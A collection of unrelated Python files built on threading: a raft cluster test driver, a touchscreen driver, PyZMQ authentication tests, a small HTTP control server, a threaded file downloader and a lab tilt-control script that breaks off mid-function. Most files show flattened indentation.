| source | python |
|---|---|
__init__.py
|
#!/usr/bin/env python3
# Copyright 2018-2020, Wayfair GmbH
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import sys
import time
import os
import signal
import subprocess
import requests
import simplejson
import websocket
import threading
#
# Simple (simplistic) library for driving test scripts
#
def rotate(arr):
return arr[1:] + [arr[0]]
class Cluster():
"""Encapsulates a uring cluster"""
def __init__(self):
self.servers = []
self.clients = []
self.config = None
def configure(self, config_file):
self.config = simplejson.load(open(config_file, 'r'))
ports = []
for node in self.config:
ports = ports + [node['port']]
for node in self.config:
port = node['port']
id = node['id']
us = UringServer()
us.set_node_id(id)
us.set_node_ports(ports)
if id == '1':
us.set_bootstrap(True)
us.reset()
us.start()
self.servers.append(us)
time.sleep(1)
rc = RaftClient()
rc.set_name(f'u{id}')
rc.set_node_id(id)
rc.set_port(port)
rc.set_host("localhost")
self.clients.append(rc)
time.sleep(1)
rc.ws_start()
ports = rotate(ports)
print('{}: {}'.format(id, port))
def adjoin(self):
time.sleep(1)
for node in self.config:
id = node['id']
if id != '1':
print(f'Registering cluster node {id}')
requests.post("http://127.0.0.1:9081/uring/{}".format(id))
class UringServer():
"""Handles interactions with uring (raft) instance."""
def __init__(self):
"""Constructs a new uring (raft) instance."""
self.id = None
self.node_ports = None
self.bootstrap = False
def set_node_id(self, id):
self.id = id
def set_node_ports(self, node_ports):
self.node_ports = node_ports
def set_bootstrap(self, bootstrap):
self.bootstrap = bootstrap
def reset(self):
subprocess.call("rm -rf raft-rocks-{}".format(self.id).split())
def start(self):
endpoint = self.node_ports[0]
peers = self.node_ports[1:]
pwd = os.path.join(os.path.dirname(__file__))
cmd = os.path.join(
pwd, "../target/debug/uring -n -e 127.0.0.1:{} ".format(endpoint))
for peer in peers:
cmd += "-p 127.0.0.1:{} ".format(peer)
if self.bootstrap:
cmd += " -b"
cmd += " -i{}".format(self.id)
cmd += " --http 127.0.0.1:{}".format(endpoint + 1000)
print(cmd)
self.cmd = subprocess.Popen(cmd, cwd='./', shell=True)
print("Started process with id: {}".format(self.cmd.pid))
def pid(self):
return self.cmd.pid
def die(self):
self.cmd.kill()
def synchronized(method):
    def f(*args, **kwargs):
        self = args[0]
        self.mutex.acquire()
        try:
            return method(*args, **kwargs)
        finally:
            self.mutex.release()
    return f
def synchronize(kclazz, names=None):
    if isinstance(names, str):
        names = names.split()
    for (name, method_handle) in list(kclazz.__dict__.items()):
        if callable(method_handle) and name != '__init__' and (names is None or name in names):
            setattr(kclazz, name, synchronized(method_handle))
class Synchronizer:
def __init__(self):
self.mutex = threading.RLock()
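# Hedged usage sketch (illustrative only; nothing else in this module uses it):
# `synchronize` rebinds the named methods of a Synchronizer subclass so that
# each call runs under the instance's RLock, which keeps concurrent WebSocket
# callbacks from interleaving. The class below is a made-up example.
class _ExampleCounter(Synchronizer):
    def __init__(self):
        Synchronizer.__init__(self)
        self.value = 0

    def bump(self):
        self.value += 1

synchronize(_ExampleCounter, 'bump')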
class ChannelObserver(Synchronizer):
    def __init__(self):
        Synchronizer.__init__(self)
        self.obs = {}
def watch(self, channel, handler):
if channel in self.obs:
self.obs[channel].append(handler)
else:
self.obs[channel] = [handler]
class RaftClient(ChannelObserver):
"""Handles client interactions to raft node."""
def __init__(self):
"""Constructs a new raft client."""
self.name = None
self.node_id = None
self.host = None
self.port = None
self.handlers = {}
self.callbacks = {}
self.ws = None
self.wsc_thread = None
        ChannelObserver.__init__(self)
        self.hub = self
self.rid = 0
def on_message(self, message):
as_json = simplejson.loads(message)
        if 'rid' in as_json:
            for handler in self.hub.obs.get('reply', []):
                handler(as_json['data'])
        if 'Msg' in as_json and 'channel' in as_json['Msg']:
            for handler in self.hub.obs.get(as_json['Msg']['channel'], []):
                handler(as_json)
return message
def on_error(self, error):
print(error)
return error
def on_close(self):
print("### closed ###")
def ws_start(self):
self.ws = websocket.WebSocketApp(
"ws://{}:{}/uring".format(self.host, self.port),
on_open=self.on_open,
on_message=self.on_message,
on_error=self.on_error,
on_close=self.on_close,
)
self.wsc_thread = threading.Thread(
name='wsc', target=self.ws.run_forever)
        self.wsc_thread.daemon = True
self.wsc_thread.start()
def select(self, protocol):
self.ws.send(simplejson.dumps({
"Select": {"rid": self.rid, "protocol": protocol}
}))
self.rid = self.rid + 1
def execute_as(self, protocol, json):
self.ws.send(simplejson.dumps(
{
"As": {
"protocol": protocol,
"cmd": json
}
}
))
def subscribe(self, channel, handler=None):
if not handler is None:
self.hub.watch(channel, handler)
self.ws.send(simplejson.dumps({
"Subscribe": {
"channel": channel
}
}))
def kv_get(self, key):
self.ws.send(simplejson.dumps(self.kv_get_cmd(key)))
def kv_get_cmd(self, key):
rid = self.rid
self.rid = self.rid + 1
return {
"Get": {
"rid": self.rid,
"key": key
}
}
def kv_put(self, key, store):
self.ws.send(simplejson.dumps(self.kv_put_cmd(key, store)))
def kv_put_cmd(self, key, store):
rid = self.rid
self.rid = self.rid + 1
return {
"Put": {
"rid": rid,
"key": key,
"store": store
}
}
def kv_cas(self, key, check, store):
self.ws.send(simplejson.dumps({
"Cas": {
"rid": self.rid,
"key": key,
"check": check,
"store": store
}
}))
self.rid = self.rid + 1
def kv_delete(self, key):
self.ws.send(simplejson.dumps(self.kv_delete_cmd(key)))
def kv_delete_cmd(self, key):
rid = self.rid
self.rid = self.rid + 1
return {
"Delete": {
"rid": rid,
"key": key
}
}
def mring_get_size(self):
self.ws.send(simplejson.dumps({
"GetSize": {
"rid": self.rid
}
}))
self.rid = self.rid + 1
def mring_set_size(self, size):
self.ws.send(simplejson.dumps({
"SetSize": {
"rid": self.rid,
"size": int(size),
}
}))
self.rid = self.rid + 1
def mring_add_node(self, name):
self.ws.send(simplejson.dumps({
"AddNode": {
"rid": self.rid,
"node": name,
}
}))
self.rid = self.rid + 1
def mring_remove_node(self, name):
self.ws.send(simplejson.dumps({
"RemoveNode": {
"rid": self.rid,
"node": name,
}
}))
self.rid = self.rid + 1
def on_open(self):
# FIXME TODO call virtual ws.open channel ...
        pass
def set_name(self, name):
self.name = name
def set_node_id(self, id):
self.node_id = id
def set_host(self, host):
self.host = host
def set_port(self, port):
self.port = port
def on(self, msg_type, handler):
if msg_type in self.handlers:
raise RuntimeError('Handler for message type ' +
msg_type + ' already registered')
self.handlers[msg_type] = handler
def status(self):
url = "http://{}:{}/status"
headers = {'Content-type': 'application/json'}
response = requests.get(url.format(
self.host, self.port + 1000), headers=headers, timeout=1)
return response
def register(self):
url = "http://{}:{}/uring/{}"
response = requests.post(url.format(
self.host, self.port + 1000, self.node_id))
return response
def get(self, k):
url = "http://{}:{}/kv/{}"
response = requests.get(url.format(self.host, self.port + 1000, k))
return response
def put(self, k, v):
url = "http://{}:{}/kv/{}"
headers = {'Content-type': 'application/json'}
response = requests.post(url.format(
self.host, self.port + 1000, k), v, headers=headers)
return response
def cas(self, k, v):
url = "http://{}:{}/kv/{}/cas"
headers = {'Content-type': 'application/json'}
response = requests.post(url.format(
self.host, self.port + 1000, k), v, headers=headers)
return response
def delete(self, k):
url = "http://{}:{}/kv/{}"
response = requests.delete(url.format(self.host, self.port + 1000, k))
return response
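# Hedged usage sketch: bring up a cluster from a JSON config (a list of
# {"id": ..., "port": ...} objects), join the follower nodes and do a KV
# round trip through the first client. The config file name is a placeholder.
if __name__ == "__main__":
    cluster = Cluster()
    cluster.configure("cluster.json")   # hypothetical config path
    cluster.adjoin()
    client = cluster.clients[0]
    client.hub.watch("reply", lambda data: print("reply:", data))
    client.kv_put("hello", "world")
    client.kv_get("hello")
    time.sleep(2)   # give the websocket thread a moment to deliver replies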
|
test.py
|
import threading
from win10toast import ToastNotifier
import time
duration_seconds = 5
def show_notification(duration):
    toaster = ToastNotifier()
    time.sleep(10)
    toaster.show_toast("hello", duration=duration)
b = threading.Thread(target=show_notification, args=[duration_seconds])
b.start()
print("task done")
|
ft5406.py
|
#https://github.com/pimoroni/python-multitouch/blob/master/library/ft5406.py
import glob
import io
import os
import errno
import struct
from collections import namedtuple
import threading
import time
import select
import queue
TOUCH_X = 0
TOUCH_Y = 1
TouchEvent = namedtuple('TouchEvent', ('timestamp', 'type', 'code', 'value'))
EV_SYN = 0
EV_ABS = 3
ABS_X = 0
ABS_Y = 1
ABS_MT_SLOT = 0x2f # 47 MT slot being modified
ABS_MT_POSITION_X = 0x35 # 53 Center X of multi touch position
ABS_MT_POSITION_Y = 0x36 # 54 Center Y of multi touch position
ABS_MT_TRACKING_ID = 0x39 # 57 Unique ID of initiated contact
TS_PRESS = 1
TS_RELEASE = 0
TS_MOVE = 2
class Touch(object):
def __init__(self, slot, x, y):
self.slot = slot
self._x = x
self._y = y
self.last_x = -1
self.last_y = -1
self._id = -1
self.events = []
self.on_move = None
self.on_press = None
self.on_release = None
@property
def position(self):
return (self.x, self.y)
@property
def last_position(self):
return (self.last_x, self.last_y)
@property
def valid(self):
return self.id > -1
@property
def id(self):
return self._id
@id.setter
def id(self, value):
if value != self._id:
if value == -1 and not TS_RELEASE in self.events:
self.events.append(TS_RELEASE)
elif not TS_PRESS in self.events:
self.events.append(TS_PRESS)
self._id = value
@property
def x(self):
return self._x
@x.setter
def x(self, value):
if value != self._x and not TS_MOVE in self.events:
self.events.append(TS_MOVE)
self.last_x = self._x
self._x = value
@property
def y(self):
return self._y
@y.setter
def y(self, value):
if value != self._y and not TS_MOVE in self.events:
self.events.append(TS_MOVE)
self.last_y = self._y
self._y = value
def handle_events(self):
"""Run outstanding press/release/move events"""
for event in self.events:
if event == TS_MOVE and callable(self.on_move):
self.on_move(event, self)
if event == TS_PRESS and callable(self.on_press):
self.on_press(event, self)
if event == TS_RELEASE and callable(self.on_release):
self.on_release(event, self)
self.events = []
class Touches(list):
@property
def valid(self):
return [touch for touch in self if touch.valid]
class Touchscreen(object):
TOUCHSCREEN_EVDEV_NAME = 'FT5406 memory based driver'
EVENT_FORMAT = str('llHHi')
EVENT_SIZE = struct.calcsize(EVENT_FORMAT)
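    # 'llHHi' mirrors the Linux evdev input_event struct: two native C longs
    # for the timestamp (tv_sec, tv_usec), two unsigned shorts for the event
    # type and code, and one signed int for the value.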
def __init__(self, device=None):
self._device = self.TOUCHSCREEN_EVDEV_NAME if device is None else device
self._running = False
self._thread = None
self._f_poll = select.poll()
self._f_device = io.open(self._touch_device(), 'rb', self.EVENT_SIZE)
self._f_poll.register(self._f_device, select.POLLIN)
self.position = Touch(0, 0, 0)
self.touches = Touches([Touch(x, 0, 0) for x in range(10)])
self._event_queue = queue.Queue()
self._touch_slot = 0
def _run(self):
self._running = True
while self._running:
self.poll()
#time.sleep(0.0001)
def run(self):
if self._thread is not None:
return
self._thread = threading.Thread(target=self._run)
self._thread.start()
def stop(self):
if self._thread is None:
return
self._running = False
self._thread.join()
self._thread = None
@property
def _current_touch(self):
return self.touches[self._touch_slot]
def close(self):
self._f_device.close()
def __enter__(self):
return self
def __exit__(self, exc_type, exc_value, exc_tb):
self.close()
def __iter__(self):
pass
def _lazy_read(self):
while self._wait_for_events():
event = self._f_device.read(self.EVENT_SIZE)
if not event:
break
yield event
def _get_pending_events(self):
for event in self._lazy_read():
(tv_sec, tv_usec, type, code, value) = struct.unpack(self.EVENT_FORMAT, event)
self._event_queue.put(TouchEvent(tv_sec + (tv_usec / 1000000), type, code, value))
def _wait_for_events(self, timeout=2):
return self._f_poll.poll(timeout)
def poll(self):
self._get_pending_events()
while not self._event_queue.empty():
event = self._event_queue.get()
self._event_queue.task_done()
if event.type == EV_SYN: # Sync
for touch in self.touches:
touch.handle_events()
return self.touches
if event.type == EV_ABS: # Absolute cursor position
if event.code == ABS_MT_SLOT:
self._touch_slot = event.value
if event.code == ABS_MT_TRACKING_ID:
self._current_touch.id = event.value
if event.code == ABS_MT_POSITION_X:
self._current_touch.x = event.value
if event.code == ABS_MT_POSITION_Y:
self._current_touch.y = event.value
if event.code == ABS_X:
self.position.x = event.value
if event.code == ABS_Y:
self.position.y = event.value
return []
def _touch_device(self):
for evdev in glob.glob("/sys/class/input/event*"):
try:
with io.open(os.path.join(evdev, 'device', 'name'), 'r') as f:
if f.read().strip() == self._device:
return os.path.join('/dev','input',os.path.basename(evdev))
except IOError as e:
if e.errno != errno.ENOENT:
raise
raise RuntimeError('Unable to locate touchscreen device: {}'.format(self._device))
def read(self):
return next(iter(self))
if __name__ == "__main__":
import signal
ts = Touchscreen()
def handle_event(event, touch):
print(["Release","Press","Move"][event],
touch.slot,
touch.x,
touch.y)
for touch in ts.touches:
touch.on_press = handle_event
touch.on_release = handle_event
touch.on_move = handle_event
ts.run()
try:
signal.pause()
except KeyboardInterrupt:
print("Stopping thread...")
ts.stop()
exit()
|
test_security.py
|
"""Test libzmq security (libzmq >= 3.3.0)"""
# -*- coding: utf8 -*-
# Copyright (C) PyZMQ Developers
# Distributed under the terms of the Modified BSD License.
import os
from threading import Thread
import zmq
from zmq.tests import (
BaseZMQTestCase, SkipTest, PYPY
)
from zmq.utils import z85
USER = b"admin"
PASS = b"password"
class TestSecurity(BaseZMQTestCase):
def setUp(self):
if zmq.zmq_version_info() < (4,0):
raise SkipTest("security is new in libzmq 4.0")
try:
zmq.curve_keypair()
except zmq.ZMQError:
raise SkipTest("security requires libzmq to be built with CURVE support")
super(TestSecurity, self).setUp()
def zap_handler(self):
socket = self.context.socket(zmq.REP)
socket.bind("inproc://zeromq.zap.01")
try:
msg = self.recv_multipart(socket)
version, sequence, domain, address, identity, mechanism = msg[:6]
if mechanism == b'PLAIN':
username, password = msg[6:]
elif mechanism == b'CURVE':
key = msg[6]
self.assertEqual(version, b"1.0")
self.assertEqual(identity, b"IDENT")
reply = [version, sequence]
if mechanism == b'CURVE' or \
(mechanism == b'PLAIN' and username == USER and password == PASS) or \
(mechanism == b'NULL'):
reply.extend([
b"200",
b"OK",
b"anonymous",
b"\5Hello\0\0\0\5World",
])
else:
reply.extend([
b"400",
b"Invalid username or password",
b"",
b"",
])
socket.send_multipart(reply)
finally:
socket.close()
def start_zap(self):
self.zap_thread = Thread(target=self.zap_handler)
self.zap_thread.start()
def stop_zap(self):
self.zap_thread.join()
def bounce(self, server, client, test_metadata=True):
msg = [os.urandom(64), os.urandom(64)]
client.send_multipart(msg)
frames = self.recv_multipart(server, copy=False)
recvd = list(map(lambda x: x.bytes, frames))
try:
if test_metadata and not PYPY:
for frame in frames:
self.assertEqual(frame.get('User-Id'), 'anonymous')
self.assertEqual(frame.get('Hello'), 'World')
self.assertEqual(frame['Socket-Type'], 'DEALER')
except zmq.ZMQVersionError:
pass
self.assertEqual(recvd, msg)
server.send_multipart(recvd)
msg2 = self.recv_multipart(client)
self.assertEqual(msg2, msg)
def test_null(self):
"""test NULL (default) security"""
server = self.socket(zmq.DEALER)
client = self.socket(zmq.DEALER)
self.assertEqual(client.MECHANISM, zmq.NULL)
self.assertEqual(server.mechanism, zmq.NULL)
self.assertEqual(client.plain_server, 0)
self.assertEqual(server.plain_server, 0)
iface = 'tcp://127.0.0.1'
port = server.bind_to_random_port(iface)
client.connect("%s:%i" % (iface, port))
self.bounce(server, client, False)
def test_plain(self):
"""test PLAIN authentication"""
server = self.socket(zmq.DEALER)
server.identity = b'IDENT'
client = self.socket(zmq.DEALER)
self.assertEqual(client.plain_username, b'')
self.assertEqual(client.plain_password, b'')
client.plain_username = USER
client.plain_password = PASS
self.assertEqual(client.getsockopt(zmq.PLAIN_USERNAME), USER)
self.assertEqual(client.getsockopt(zmq.PLAIN_PASSWORD), PASS)
self.assertEqual(client.plain_server, 0)
self.assertEqual(server.plain_server, 0)
server.plain_server = True
self.assertEqual(server.mechanism, zmq.PLAIN)
self.assertEqual(client.mechanism, zmq.PLAIN)
assert not client.plain_server
assert server.plain_server
self.start_zap()
iface = 'tcp://127.0.0.1'
port = server.bind_to_random_port(iface)
client.connect("%s:%i" % (iface, port))
self.bounce(server, client)
self.stop_zap()
def skip_plain_inauth(self):
"""test PLAIN failed authentication"""
server = self.socket(zmq.DEALER)
server.identity = b'IDENT'
client = self.socket(zmq.DEALER)
self.sockets.extend([server, client])
client.plain_username = USER
client.plain_password = b'incorrect'
server.plain_server = True
self.assertEqual(server.mechanism, zmq.PLAIN)
self.assertEqual(client.mechanism, zmq.PLAIN)
self.start_zap()
iface = 'tcp://127.0.0.1'
port = server.bind_to_random_port(iface)
client.connect("%s:%i" % (iface, port))
client.send(b'ping')
server.rcvtimeo = 250
self.assertRaisesErrno(zmq.EAGAIN, server.recv)
self.stop_zap()
def test_keypair(self):
"""test curve_keypair"""
try:
public, secret = zmq.curve_keypair()
except zmq.ZMQError:
raise SkipTest("CURVE unsupported")
self.assertEqual(type(secret), bytes)
self.assertEqual(type(public), bytes)
self.assertEqual(len(secret), 40)
self.assertEqual(len(public), 40)
# verify that it is indeed Z85
        bsecret, bpublic = [ z85.decode(key) for key in (secret, public) ]
self.assertEqual(type(bsecret), bytes)
self.assertEqual(type(bpublic), bytes)
self.assertEqual(len(bsecret), 32)
self.assertEqual(len(bpublic), 32)
def test_curve(self):
"""test CURVE encryption"""
server = self.socket(zmq.DEALER)
server.identity = b'IDENT'
client = self.socket(zmq.DEALER)
self.sockets.extend([server, client])
try:
server.curve_server = True
except zmq.ZMQError as e:
# will raise EINVAL if no CURVE support
if e.errno == zmq.EINVAL:
raise SkipTest("CURVE unsupported")
server_public, server_secret = zmq.curve_keypair()
client_public, client_secret = zmq.curve_keypair()
server.curve_secretkey = server_secret
server.curve_publickey = server_public
client.curve_serverkey = server_public
client.curve_publickey = client_public
client.curve_secretkey = client_secret
self.assertEqual(server.mechanism, zmq.CURVE)
self.assertEqual(client.mechanism, zmq.CURVE)
self.assertEqual(server.get(zmq.CURVE_SERVER), True)
self.assertEqual(client.get(zmq.CURVE_SERVER), False)
self.start_zap()
iface = 'tcp://127.0.0.1'
port = server.bind_to_random_port(iface)
client.connect("%s:%i" % (iface, port))
self.bounce(server, client)
self.stop_zap()
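# A minimal stand-alone sketch (not part of the test suite) of the CURVE setup
# the tests above exercise: the server holds its secret key and the client pins
# the server's public key via curve_serverkey. With no ZAP handler running,
# libzmq still encrypts the connection but accepts any client key. Assumes
# libzmq was built with CURVE support.
def _curve_roundtrip_demo():
    ctx = zmq.Context.instance()
    server = ctx.socket(zmq.REP)
    client = ctx.socket(zmq.REQ)
    server_public, server_secret = zmq.curve_keypair()
    client_public, client_secret = zmq.curve_keypair()
    server.curve_server = True
    server.curve_secretkey = server_secret
    client.curve_serverkey = server_public
    client.curve_publickey = client_public
    client.curve_secretkey = client_secret
    port = server.bind_to_random_port('tcp://127.0.0.1')
    client.connect('tcp://127.0.0.1:%i' % port)
    client.send(b'ping')
    assert server.recv() == b'ping'
    server.send(b'pong')
    assert client.recv() == b'pong'
    for sock in (client, server):
        sock.close(linger=0)

if __name__ == "__main__":
    _curve_roundtrip_demo()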
|
control_http_server.py
|
import http.server
import json
import threading
from .shared_state import shared_state, shared_state_lock, regenerate_data
PORT = 8080
# Binds to all network interfaces by default
# from https://gist.github.com/mdonkers/63e115cc0c79b4f6b8b3a6b797e485c7
# POST to '/' to set parameters:
# {
# "cpu_pause_ms": 100,
# "message_bytes": 20,
# "period_sec": 0.2
# }
# Must pass handler as a CLASS, capture state in closure:
class Handler(http.server.BaseHTTPRequestHandler):
def _set_response(self):
self.send_response(200)
# TODO: should use JSON mime type
self.send_header('Content-type', 'text/html')
self.end_headers()
def do_GET(self):
# print("GET request,\nPath: %s\nHeaders:\n%s\n", str(self.path), str(self.headers))
self._set_response()
# self.wfile.write("GET request for {}".format(self.path).encode('utf-8'))
def do_POST(self):
content_length = int(self.headers['Content-Length'])
post_data = self.rfile.read(content_length)
body = post_data.decode('utf-8')
# TODO: check JSON mime type
# print("POST request,\nPath: %s\nHeaders:\n%s\n\nBody:\n%s\n",
# str(self.path), str(self.headers), body)
body_parsed = json.loads(body)
with shared_state_lock:
# Just overwrite, the other thread only reads.
# TODO: validate types.
for key in ['cpu_pause_ms', 'message_bytes', 'period_sec']:
if key in body_parsed:
shared_state['params'][key] = body_parsed[key]
else:
print('missing key in POST data: ' + key)
regenerate_data()
print('new configuration is: ' + str(shared_state['params']))
self._set_response()
self.wfile.write("{'result':'new config applied.'}".encode('utf-8'))
def run_control_server():
http_server_thread = threading.Thread(target=__run)
http_server_thread.start()
def __run():
    # 'with' is not supported for the httpd object on Python 3.5.
    # TODO: migrate to 'with' once Ubuntu ships Python 3.6.
httpd = http.server.HTTPServer(('', PORT), Handler)
print("HTTP control server listening on :", PORT)
try:
httpd.serve_forever()
except KeyboardInterrupt:
pass
httpd.server_close()
print('Stopping httpd...')
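# Hedged client-side example (defined but not called anywhere): push a new
# parameter set to a running control server, mirroring the POST body documented
# above. The localhost address is an assumption for local testing.
def _example_set_params(host='localhost', port=PORT):
    import urllib.request
    body = json.dumps(
        {'cpu_pause_ms': 100, 'message_bytes': 20, 'period_sec': 0.2}
    ).encode('utf-8')
    request = urllib.request.Request(
        'http://{}:{}/'.format(host, port),
        data=body,
        headers={'Content-type': 'application/json'},
    )
    with urllib.request.urlopen(request) as response:
        return response.read()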
if __name__ == '__main__':
run_control_server()
|
cli.py
|
"""Console script for threaded_file_downloader."""
import sys
import threading
import requests
import click
import os
def download(url: str, outdir):
bytes_: bytes = requests.get(url).content
filename = url.rsplit("/", 1)[1]
outfile = os.path.join(outdir, filename)
with open(outfile, 'wb') as f:
f.write(bytes_)
@click.command(help="Download a list of URLs from a text file (one URL per line)")
@click.argument('input-file')
@click.argument('output-dir')
def main(input_file, output_dir):
if not os.path.exists(output_dir):
os.makedirs(output_dir)
with open(input_file) as f:
        for line in f:
            line = line.strip()
            if line:
                x = threading.Thread(target=download, args=(line, output_dir))
x.start()
return 0
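# Hedged variant (not wired into the CLI above): bound the number of concurrent
# downloads and wait for all of them to finish, using the standard library
# thread pool instead of one bare Thread per URL. The max_workers value is an
# arbitrary illustration.
def download_all(urls, outdir, max_workers=8):
    from concurrent.futures import ThreadPoolExecutor
    with ThreadPoolExecutor(max_workers=max_workers) as pool:
        for url in urls:
            pool.submit(download, url, outdir)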
if __name__ == "__main__":
sys.exit(main()) # pragma: no cover
|
TiltControlOnlineDecoderNoLoadCells.py
|
import definitions
from definitions import *
import threading
from threading import Thread
from multiprocessing import *
import numpy as np
import xlwt
import csv
import TestRunwLoadCells
from TestRunwLoadCells import *
import MAPOnlineDecoder
### TO TEST: HOW PAUSE WORKS, CHECK PRINT STATEMENTS ARE CORRECT, WHILE LOOP IS WORKING, EACH TIME.SLEEP IS CHANGED TO A DURATION
##Parameters:0
#Tilt Types: (1, 3, 4, 6)
#make sure that NI-DAQ are not using the lines at the same time, i.e. test panel
#data array for Dev3/port0/line0:7 corresponds to channels going to SI Programmer
# lines([0,1,2,3,4,5,6,7])
#tilt = np.array([IN3,IN4,IN5/cwjog,IN6/ccwjog(Go_5V),Wait_5V,?,?,?])
# Tilts have been edited to work with Si Tilt Program
#BMITiltProgram6b- from Nate B's work (renamed a copy to TiltControl)
##Load Cells
##Transducer 2 (26922)
class StopThread(threading.Thread):
    def __init__(self):
        threading.Thread.__init__(self)
self.taskstop = nidaqmx.Task()
self.taskstop.di_channels.add_di_chan("Dev4/port2/line6", line_grouping = LineGrouping.CHAN_PER_LINE)
self.taskstop.start()
def run(self):
stop_time = time.time()
stoppulse = self.taskstop.read(number_of_samples_per_channel = 1)
return stoppulse
def end(self):
self.taskstop.stop()
def LoadCellThread():
Chan_list = ["Dev6/ai18", "Dev6/ai19", "Dev6/ai20", "Dev6/ai21", "Dev6/ai22", "Dev6/ai23","Dev6/ai32", "Dev6/ai33", "Dev6/ai34", "Dev6/ai35", "Dev6/ai36", "Dev6/ai37","Dev6/ai38", "Dev6/ai39", "Dev6/ai48", "Dev6/ai49", "Dev6/ai50", "Dev6/ai51",'Timestamp']
with nidaqmx.Task() as task, nidaqmx.Task() as taskstart:
#######################################################
sheetName = 'CSM001_TILT_SYNCEDLOCAL_72219_LOADCELL'
#######################################################
with open(sheetName + '.csv','w+',newline='') as f:
###Initialize Channels and Variables
task.ai_channels.add_ai_voltage_chan("Dev6/ai18:23,Dev6/ai32:39,Dev6/ai48:51")
### timing to 1000 Hz
task.timing.cfg_samp_clk_timing(1000, sample_mode= AcquisitionType.CONTINUOUS)
###Start Pulse task
taskstart.di_channels.add_di_chan("Dev4/port2/line5", line_grouping = LineGrouping.CHAN_PER_LINE )
taskstart.read(number_of_samples_per_channel=1)
###Initiate Variables
samples = 1000
channels = len(Chan_list) - 1
counter = 0
###Collects data and time
data = [[0 for i in range(samples)] for i in range(channels)]
tic = round(time.time(),3)
#toc = round((time.time()-tic),3)
###Process time
ticsamps = np.linspace(tic,(tic+1),samples)
#ticsamps = np.linspace(toc,(toc+1),samples)
ticsamps = ticsamps.tolist()
data.append(ticsamps)
###
total = samples*len(data)
channelList = np.zeros(total).reshape(len(data),samples)
running = True
writer = csv.writer(f)
wait_start = True
###Wait for Start Pulse
while wait_start == True:
ex = taskstart.read(number_of_samples_per_channel=1)
print(ex)
if ex == True or ex == [True]:
endtiming = 0
taskstart.stop()
wait_start = False
csvrunlogging = True
print('start stop thread')
taskstopthread = StopThread()
print('open csv')
##############Read and Record Continuous Loop
writer = csv.writer(f)
writer.writerow(Chan_list)
print('start')
while running == True:
data = task.read(samples)
if counter ==0:
tic = round(time.time(),3)
counter = counter + 1
else:
tic = tic + 1.001
ticsamps = np.linspace(tic,(tic+1),samples)
ticsamps = ticsamps.tolist()
data.append(ticsamps)
for key in range(len(data)):
for i in range(samples):
channelList[key][i] = data[key][i]
for i in range(samples):
row = [item[i] for item in channelList]
writer.writerow(row)
stahp = taskstopthread.run()
if stahp ==[False]:
running = False
print('done')
task.stop()
taskstopthread.end()
#############End of LoadCells
#####################################################################################################################################################################################################################
#Tilt class beings here
class tiltclass():
def __init__(self):
self.WaterDuration = 0.15
self.punish = np.array([0,1,0,0,0,0,0,0], dtype=np.uint8)
self.reward = np.array([0,1,1,0,0,0,0,0], dtype=np.uint8)
self.start1 = np.array([1,0,0,1,0,0,0,0], dtype=np.uint8)
self.start3 = np.array([1,1,0,1,0,0,0,0], dtype=np.uint8)
self.start4 = np.array([0,0,1,1,0,0,0,0], dtype=np.uint8)
self.start6 = np.array([0,1,1,1,0,0,0,0], dtype=np.uint8)
self.tilt1 = np.array([1,0,0,1,0,0,0,0], dtype=np.uint8)
self.tilt3 = np.array([1,1,0,1,0,0,0,0], dtype=np.uint8)
self.tilt4 = np.array([0,0,1,1,0,0,0,0], dtype=np.uint8)
self.tilt6 = np.array([0,1,1,1,0,0,0,0], dtype=np.uint8)
self.begin = np.array([0,0,0,0,0,0,0,0], dtype=np.uint8)
self.wateron = np.array([0,0,0,0,1,0,0,0], dtype=np.uint8)
#task = Task()
#task.CreateDOChan("/Dev4/port0/line0:7","",PyDAQmx.DAQmx_Val_ChanForAllLines)
#task.StartTask()
#task.WriteDigitalLines(1,1,10.0,PyDAQmx.DAQmx_Val_GroupByChannel,data,None,None)
#test = np.array([0,0,0,0,1,1,1,1], dtype=np.uint8)
#testall = np.array([1,1,1,1,1,1,1,1], dtype=np.uint8)
#pseudo-random generator 1,2,3,4
#Task is from PyDAQmx
def tilt(self,i,task,taskinterrupt,tilts,psthclass,client,baseline_recording):
delay = ((randint(1,100))/100)+1.5
#Needs x = choose() as shown below
if int(tilts[i]) == 1:
data = self.tilt1
data2 = self.start1
elif int(tilts[i]) == 2:
data = self.tilt3
data2 = self.start3
elif int(tilts[i]) == 3:
data = self.tilt4
data2 = self.start4
elif int(tilts[i]) == 4:
data = self.tilt6
data2 = self.start6
#Reduce the timestamps in buffer and wait for pretime to add to buffer.
res = client.get_ts()
time.sleep(psthclass.pre_time)
################################################################################################################################################################################################################
#Time dependent section. Will include the client and decode here.
tiltbegintime = time.time()
tiltwaittime = time.time() - tiltbegintime
task.WriteDigitalLines(1,1,10.0,PyDAQmx.DAQmx_Val_GroupByChannel,data,None,None)
task.WriteDigitalLines(1,1,10.0,PyDAQmx.DAQmx_Val_GroupByChannel,data2,None,None)
time.sleep(psthclass.post_time)
# Get accumulated timestamps
res = client.get_ts()
# Print information on the data returned
for t in res: #50ms
# Print information on spike channel 1
if t.Type == PL_SingleWFType and t.Channel in psthclass.channel_dict.keys() and t.Unit in psthclass.channel_dict[t.Channel]:
psthclass.build_unit(t.Channel,t.Unit,t.TimeStamp)
# Print information on events
if t.Type == PL_ExtEventType:
#print(('Event Ts: {}s Ch: {} Type: {}').format(t.TimeStamp, t.Channel, t.Type))
if t.Channel == 257: #Channel for Strobed Events.
psthclass.event(t.TimeStamp, t.Unit)
psthclass.psth()
if baseline_recording == False:
decoderesult = psthclass.decode()
####
if decoderesult == True: #Change statement later for if the decoder is correct.
taskinterrupt.WriteDigitalLines(1,1,10.0,PyDAQmx.DAQmx_Val_GroupByChannel,self.reward,None,None)
task.WriteDigitalLines(1,1,10.0,PyDAQmx.DAQmx_Val_GroupByChannel,self.wateron,None,None)
time.sleep(self.WaterDuration)##### water duration --- can keep this
task.WriteDigitalLines(1,1,10.0,PyDAQmx.DAQmx_Val_GroupByChannel,self.begin,None,None)
taskinterrupt.WriteDigitalLines(1,1,10.0,PyDAQmx.DAQmx_Val_GroupByChannel,self.begin,None,None)
else: ###This will be if decoder is false, have to deal with punishment tilt.
taskinterrupt.WriteDigitalLines(1,1,10.0,PyDAQmx.DAQmx_Val_GroupByChannel,self.punish,None,None)
time.sleep(self.WaterDuration)
